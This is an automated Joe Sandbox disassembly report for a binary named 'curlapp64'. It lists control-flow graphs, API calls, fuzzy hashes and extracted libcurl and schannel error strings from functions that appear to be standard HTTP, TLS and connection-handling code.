                                                                                                                                                                                                  control_flow_graph 1518 7ff8b7eae4c0-7ff8b7eae4fe GetLastError _errno 1519 7ff8b7eae500-7ff8b7eae502 1518->1519 1520 7ff8b7eae507-7ff8b7eae518 1518->1520 1521 7ff8b7eaea2e-7ff8b7eaea4c call 7ff8b7ec9e10 1519->1521 1522 7ff8b7eae51e 1520->1522 1523 7ff8b7eae8bc-7ff8b7eae8c2 1520->1523 1525 7ff8b7eae8b0-7ff8b7eae8b7 1522->1525 1526 7ff8b7eae524-7ff8b7eae52d 1522->1526 1527 7ff8b7eae936-7ff8b7eae93f 1523->1527 1528 7ff8b7eae8c4 1523->1528 1533 7ff8b7eae54f-7ff8b7eae55c call 7ff8b7eaf5b0 1525->1533 1530 7ff8b7eae533-7ff8b7eae543 1526->1530 1531 7ff8b7eae9be-7ff8b7eae9cb 1526->1531 1527->1531 1532 7ff8b7eae941-7ff8b7eae959 1527->1532 1534 7ff8b7eae8c6-7ff8b7eae8cc 1528->1534 1535 7ff8b7eae92a-7ff8b7eae931 1528->1535 1530->1533 1531->1533 1539 7ff8b7eae9d1-7ff8b7eae9e9 call 7ff8b7e94eb0 1531->1539 1532->1531 1542 7ff8b7eae561-7ff8b7eae56d 1533->1542 1536 7ff8b7eae91e-7ff8b7eae925 1534->1536 1537 7ff8b7eae8ce-7ff8b7eae8d4 1534->1537 1535->1533 1536->1533 1540 7ff8b7eae912-7ff8b7eae919 1537->1540 1541 7ff8b7eae8d6-7ff8b7eae8dc 1537->1541 1549 7ff8b7eae9fb-7ff8b7eaea0c _errno 1539->1549 1540->1533 1545 7ff8b7eae906-7ff8b7eae90d 1541->1545 1546 7ff8b7eae8de-7ff8b7eae8e4 1541->1546 1547 7ff8b7eae573-7ff8b7eae58d call 7ff8b7e94eb0 1542->1547 1548 7ff8b7eae9eb-7ff8b7eae9f2 1542->1548 1545->1533 1551 7ff8b7eae8e6-7ff8b7eae8e8 1546->1551 1552 7ff8b7eae8fa-7ff8b7eae901 1546->1552 1547->1549 1548->1549 1550 7ff8b7eae9f6 call 7ff8b7e94eb0 1548->1550 1554 7ff8b7eaea17-7ff8b7eaea20 GetLastError 1549->1554 1555 7ff8b7eaea0e-7ff8b7eaea14 _errno 1549->1555 1550->1549 1551->1531 1556 7ff8b7eae8ee-7ff8b7eae8f5 1551->1556 1552->1533 1558 7ff8b7eaea22-7ff8b7eaea25 SetLastError 1554->1558 1559 7ff8b7eaea2b 1554->1559 1555->1554 1556->1533 1558->1559 1559->1521
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                                                                                                                                                                                  • API String ID: 3939687465-2168394622
                                                                                                                                                                                                  • Opcode ID: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                                                                                                                                                  • Instruction ID: 2506718946e088cec07e5f01cbfd096c94a0d49ab19b09445e02c2cdeee2c466
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B518C76A0CB4689FA649B5DE8456BD23A6BF44FC4F884032DB0E462B1EF3CF595D210
                                                                                                                                                                                                  Function 00007FF8B7E62A50 Relevance: 28.7, APIs: 19, Instructions: 169COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1560 7ff8b7e62a50-7ff8b7e62a9b calloc 1561 7ff8b7e62bf4-7ff8b7e62bfd _errno 1560->1561 1562 7ff8b7e62aa1-7ff8b7e62b20 malloc 1560->1562 1565 7ff8b7e62bff-7ff8b7e62c1b 1561->1565 1563 7ff8b7e62b63-7ff8b7e62b6b 1562->1563 1564 7ff8b7e62b22-7ff8b7e62b4d InitializeCriticalSectionEx call 7ff8b7eab3f0 1562->1564 1567 7ff8b7e62b6d-7ff8b7e62b73 closesocket 1563->1567 1568 7ff8b7e62b7b-7ff8b7e62b82 1563->1568 1572 7ff8b7e62c1c-7ff8b7e62c30 _strdup 1564->1572 1573 7ff8b7e62b53-7ff8b7e62b5b 1564->1573 1567->1568 1570 7ff8b7e62b94-7ff8b7e62ba5 free 1568->1570 1571 7ff8b7e62b84-7ff8b7e62b8e DeleteCriticalSection free 1568->1571 1574 7ff8b7e62bac-7ff8b7e62bb4 1570->1574 1575 7ff8b7e62ba7 call 7ff8b7e716c0 1570->1575 1571->1570 1572->1563 1576 7ff8b7e62c36-7ff8b7e62c56 free _strdup 1572->1576 1573->1563 1578 7ff8b7e62bbc-7ff8b7e62bee free 1574->1578 1579 7ff8b7e62bb6 closesocket 1574->1579 1575->1574 1580 7ff8b7e62c58-7ff8b7e62c67 call 7ff8b7e748e0 1576->1580 1581 7ff8b7e62c84-7ff8b7e62c8e 1576->1581 1578->1561 1579->1578 1585 7ff8b7e62c6c-7ff8b7e62c72 1580->1585 1583 7ff8b7e62c90-7ff8b7e62cb8 EnterCriticalSection LeaveCriticalSection 1581->1583 1584 7ff8b7e62d02-7ff8b7e62d1d free 1581->1584 1586 7ff8b7e62ccb-7ff8b7e62cce 1583->1586 1587 7ff8b7e62cba-7ff8b7e62cc2 call 7ff8b7e74920 1583->1587 1584->1561 1588 7ff8b7e62cc4-7ff8b7e62cc6 1585->1588 1589 7ff8b7e62c74-7ff8b7e62c81 _errno 1585->1589 1591 7ff8b7e62cd8-7ff8b7e62ce8 call 7ff8b7e628c0 free 1586->1591 1592 7ff8b7e62cd0-7ff8b7e62cd3 call 7ff8b7e74930 1586->1592 1597 7ff8b7e62cee-7ff8b7e62cfc call 7ff8b7e978b0 closesocket 1587->1597 1588->1565 1589->1581 1591->1597 1592->1591 1597->1584
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$CriticalSection$closesocket$_errno_strdup$DeleteEnterInitializeLeavecallocmallocsocket
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 941918121-0
                                                                                                                                                                                                  • Opcode ID: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                                                                                                                                                  • Instruction ID: 9a761edd27d7e61fae8c622b3c99c1f563debe447eb252c910a3e595b32352bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA812926A19B8282E764DF29A85026D7764FF98BA4F005235DBAE027B1DF3CF1D4C310
                                                                                                                                                                                                  Function 00007FF8B7EC15D0 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1714 7ff8b7ec15d0-7ff8b7ec164d call 7ff8b7ec4a40 call 7ff8b7ec4a20 call 7ff8b7ebc700 1721 7ff8b7ec164f-7ff8b7ec1659 call 7ff8b7e74b60 1714->1721 1722 7ff8b7ec165e-7ff8b7ec1662 1714->1722 1721->1722 1724 7ff8b7ec1664-7ff8b7ec1684 GetModuleHandleW GetProcAddress 1722->1724 1725 7ff8b7ec16ae 1722->1725 1724->1725 1726 7ff8b7ec1686-7ff8b7ec16a8 call 7ff8b7ebc700 1724->1726 1727 7ff8b7ec16b0-7ff8b7ec16b7 1725->1727 1726->1725 1734 7ff8b7ec16aa-7ff8b7ec16ac 1726->1734 1729 7ff8b7ec16c3-7ff8b7ec16e5 call 7ff8b7ebc700 1727->1729 1730 7ff8b7ec16b9-7ff8b7ec16bd 1727->1730 1737 7ff8b7ec16eb 1729->1737 1738 7ff8b7ec1a1c-7ff8b7ec1a2b call 7ff8b7e74a70 1729->1738 1730->1729 1732 7ff8b7ec16bf-7ff8b7ec16c1 1730->1732 1735 7ff8b7ec16ed-7ff8b7ec16f8 1732->1735 1734->1727 1739 7ff8b7ec1734-7ff8b7ec173a call 7ff8b7ec0380 1735->1739 1740 7ff8b7ec16fa-7ff8b7ec171b call 7ff8b7ec5af0 call 7ff8b7ec53d0 1735->1740 1737->1735 1748 7ff8b7ec1a30-7ff8b7ec1a59 call 7ff8b7ec9e10 1738->1748 1746 7ff8b7ec173f-7ff8b7ec1745 1739->1746 1755 7ff8b7ec1727-7ff8b7ec1732 call 7ff8b7ec5b20 1740->1755 1756 7ff8b7ec171d-7ff8b7ec1724 1740->1756 1746->1748 1749 7ff8b7ec174b-7ff8b7ec1752 1746->1749 1752 7ff8b7ec1757-7ff8b7ec176a call 7ff8b7e726d0 1749->1752 1753 7ff8b7ec1754 1749->1753 1760 7ff8b7ec1770-7ff8b7ec1774 1752->1760 1761 7ff8b7ec18b9-7ff8b7ec18be 1752->1761 1753->1752 1755->1739 1755->1760 1756->1755 1763 7ff8b7ec1776-7ff8b7ec1780 call 7ff8b7e74b60 1760->1763 1764 7ff8b7ec1785-7ff8b7ec1789 1760->1764 1761->1748 1763->1764 1766 7ff8b7ec183b-7ff8b7ec1852 1764->1766 1767 7ff8b7ec178f-7ff8b7ec17a9 call 7ff8b7ec4040 1764->1767 1768 7ff8b7ec1859-7ff8b7ec1885 1766->1768 1775 7ff8b7ec17c4-7ff8b7ec1839 memmove call 7ff8b7ebc980 call 7ff8b7ec4100 call 7ff8b7e74b60 1767->1775 1776 7ff8b7ec17ab-7ff8b7ec17bf call 7ff8b7e74a70 1767->1776 1770 7ff8b7ec1887 1768->1770 1771 7ff8b7ec188e-7ff8b7ec18a8 calloc 1768->1771 1770->1771 1773 7ff8b7ec18c3-7ff8b7ec1924 1771->1773 1774 7ff8b7ec18aa-7ff8b7ec18b4 call 7ff8b7e74a70 1771->1774 1784 7ff8b7ec1926-7ff8b7ec1951 free call 7ff8b7eae4c0 1773->1784 1785 7ff8b7ec199d-7ff8b7ec19bc call 7ff8b7e68c60 1773->1785 1774->1761 1775->1768 1776->1748 1792 7ff8b7ec1953-7ff8b7ec1959 1784->1792 1793 7ff8b7ec1987-7ff8b7ec1998 call 7ff8b7e74a70 1784->1793 1791 7ff8b7ec19c1-7ff8b7ec19df 1785->1791 1799 7ff8b7ec1a03-7ff8b7ec1a1a call 7ff8b7e74a70 1791->1799 1800 7ff8b7ec19e1-7ff8b7ec19e4 1791->1800 1795 7ff8b7ec1971-7ff8b7ec1982 call 7ff8b7e74a70 1792->1795 1796 7ff8b7ec195b-7ff8b7ec196c call 7ff8b7e74a70 1792->1796 1793->1748 1795->1748 1796->1748 1799->1748 1800->1799 1804 7ff8b7ec19e6-7ff8b7ec1a01 1800->1804 1804->1748
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                                                                                                                                                                                                  • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                                                                                                                                                                                  • API String ID: 3185706071-3097429119
                                                                                                                                                                                                  • Opcode ID: 21ea13d0d9fcf41649c1bf54b75223b03c8a23e0c26cd988a21429c5f5289b1c
                                                                                                                                                                                                  • Instruction ID: b4daa834e4cb5ecfecb9d0faa9d0d9827c18a06c53f2ce0fbf32c210e674d990
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ea13d0d9fcf41649c1bf54b75223b03c8a23e0c26cd988a21429c5f5289b1c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99D1177AA08B418AFB209B69E8402AE37A4FF45BC8F544035EB4D07BA5DF7CE559C740
                                                                                                                                                                                                  Function 00007FF6CF975860 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1856 7ff6cf975860-7ff6cf9758ad 1857 7ff6cf9758b2-7ff6cf975931 curl_easy_setopt * 5 1856->1857 1858 7ff6cf9758af 1856->1858 1859 7ff6cf975933-7ff6cf97593a 1857->1859 1860 7ff6cf975951 1857->1860 1858->1857 1861 7ff6cf97593c 1859->1861 1862 7ff6cf975953-7ff6cf975982 curl_easy_setopt 1859->1862 1860->1862 1863 7ff6cf975940-7ff6cf975943 1861->1863 1864 7ff6cf975984-7ff6cf97598b 1862->1864 1865 7ff6cf9759a1 1862->1865 1863->1860 1867 7ff6cf975945-7ff6cf97594d 1863->1867 1866 7ff6cf9759a3-7ff6cf9759c6 curl_easy_setopt curl_easy_perform 1864->1866 1868 7ff6cf97598d 1864->1868 1865->1866 1869 7ff6cf9759cc-7ff6cf9759ec curl_easy_strerror 1866->1869 1870 7ff6cf975a89-7ff6cf975aa3 call 7ff6cf977c00 1866->1870 1867->1863 1871 7ff6cf97594f 1867->1871 1872 7ff6cf975990-7ff6cf975993 1868->1872 1873 7ff6cf9759f0-7ff6cf9759f8 1869->1873 1879 7ff6cf975a65-7ff6cf975a88 call 7ff6cf9a3b30 1870->1879 1880 7ff6cf975aa5-7ff6cf975ab7 1870->1880 1871->1862 1872->1865 1874 7ff6cf975995-7ff6cf97599d 1872->1874 1873->1873 1877 7ff6cf9759fa-7ff6cf975a35 call 7ff6cf97b6c0 1873->1877 1874->1872 1878 7ff6cf97599f 1874->1878 1877->1879 1887 7ff6cf975a37-7ff6cf975a49 1877->1887 1878->1866 1882 7ff6cf975ab9-7ff6cf975acc 1880->1882 1883 7ff6cf975a60 call 7ff6cf9a3b50 1880->1883 1882->1883 1886 7ff6cf975ace-7ff6cf975af6 call 7ff6cf9b1878 call 7ff6cf977880 1882->1886 1883->1879 1894 7ff6cf975afb-7ff6cf975b03 1886->1894 1887->1883 1891 7ff6cf975a4b-7ff6cf975a5e 1887->1891 1891->1883 1891->1886
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF9758BA
                                                                                                                                                                                                  • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF9758CF
                                                                                                                                                                                                  • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF9758E2
                                                                                                                                                                                                  • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF9758F6
                                                                                                                                                                                                  • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF97590A
                                                                                                                                                                                                  • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF975965
                                                                                                                                                                                                  • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF9759B5
                                                                                                                                                                                                  • curl_easy_perform.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF9759BE
                                                                                                                                                                                                  • curl_easy_strerror.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CF974DB6), ref: 00007FF6CF9759CE
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CF975ACE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: curl_easy_setopt$_invalid_parameter_noinfo_noreturncurl_easy_performcurl_easy_strerror
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 496898497-278324492
                                                                                                                                                                                                  • Opcode ID: 2b8b2e808e1c965a009366a61660bc5d1e6316d1fd7c01ec76144b79d3684a5a
                                                                                                                                                                                                  • Instruction ID: 4838d84ec4cba357a23194b71fe43ba10142dbfbe6ff15906907897ff68b7fde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b8b2e808e1c965a009366a61660bc5d1e6316d1fd7c01ec76144b79d3684a5a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C171EF62E08B8582EF508F25E4403796361FB84BE1F544232DAEE82BDACF7CE485C750
                                                                                                                                                                                                  Function 00007FF8B7EB8E00 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 137stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _strdupcallocfreestrncmp
                                                                                                                                                                                                  • String ID: Could not resolve %s: %s$Failed to resolve %s '%s' with timeout after %lld ms$Unix socket path too long: '%s'$anonymous$host$localhost/$proxy
                                                                                                                                                                                                  • API String ID: 2270677362-4063513385
                                                                                                                                                                                                  • Opcode ID: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                                                                                                                                                  • Instruction ID: 448f9d979a43bbd50572b7a8230dbaa9b1906aeb4d2fe12909d4a6a01620bb05
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49519D21A0DB8685FB618B2994803AD2B61EF45FC8F484035DF4D5B3A9EF3DE985C740
                                                                                                                                                                                                  Function 00007FF8B7E6D570 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 487COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CounterPerformanceQuery
                                                                                                                                                                                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                                                                                                                                                                                                  • API String ID: 2783962273-3359130258
                                                                                                                                                                                                  • Opcode ID: b3c7b5fa76dae2605b5a1260e730892d5871512b3ff91e60a542b766e974f9da
                                                                                                                                                                                                  • Instruction ID: ae60077e349051e1baaf6b331d217febe7b30ce7cd0e106ab9bb08f8d2f2c2c4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3c7b5fa76dae2605b5a1260e730892d5871512b3ff91e60a542b766e974f9da
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46328A22B08B858AEB11CF6994412BC37A1AF44F98F444235DF5D67BA9DF3CE552E380
                                                                                                                                                                                                  Function 00007FF8B7EA2110 Relevance: 13.7, APIs: 9, Instructions: 247networksleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$Sleep$select
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2442476585-0
                                                                                                                                                                                                  • Opcode ID: db324bb6ee2e556e08998bc156a60d69185baaaaf9b3885c571f797cb652de86
                                                                                                                                                                                                  • Instruction ID: 991f8701cf85f2ba82e5362c134f92ddc10ae9cfd4d96123caca090dbe32924a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: db324bb6ee2e556e08998bc156a60d69185baaaaf9b3885c571f797cb652de86
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21A1A321B0878286EB794F2D98042BD6399FF95FE4F104634DF6D76AE4DE3D9A448310
                                                                                                                                                                                                  Function 00007FF8B7E65EA0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
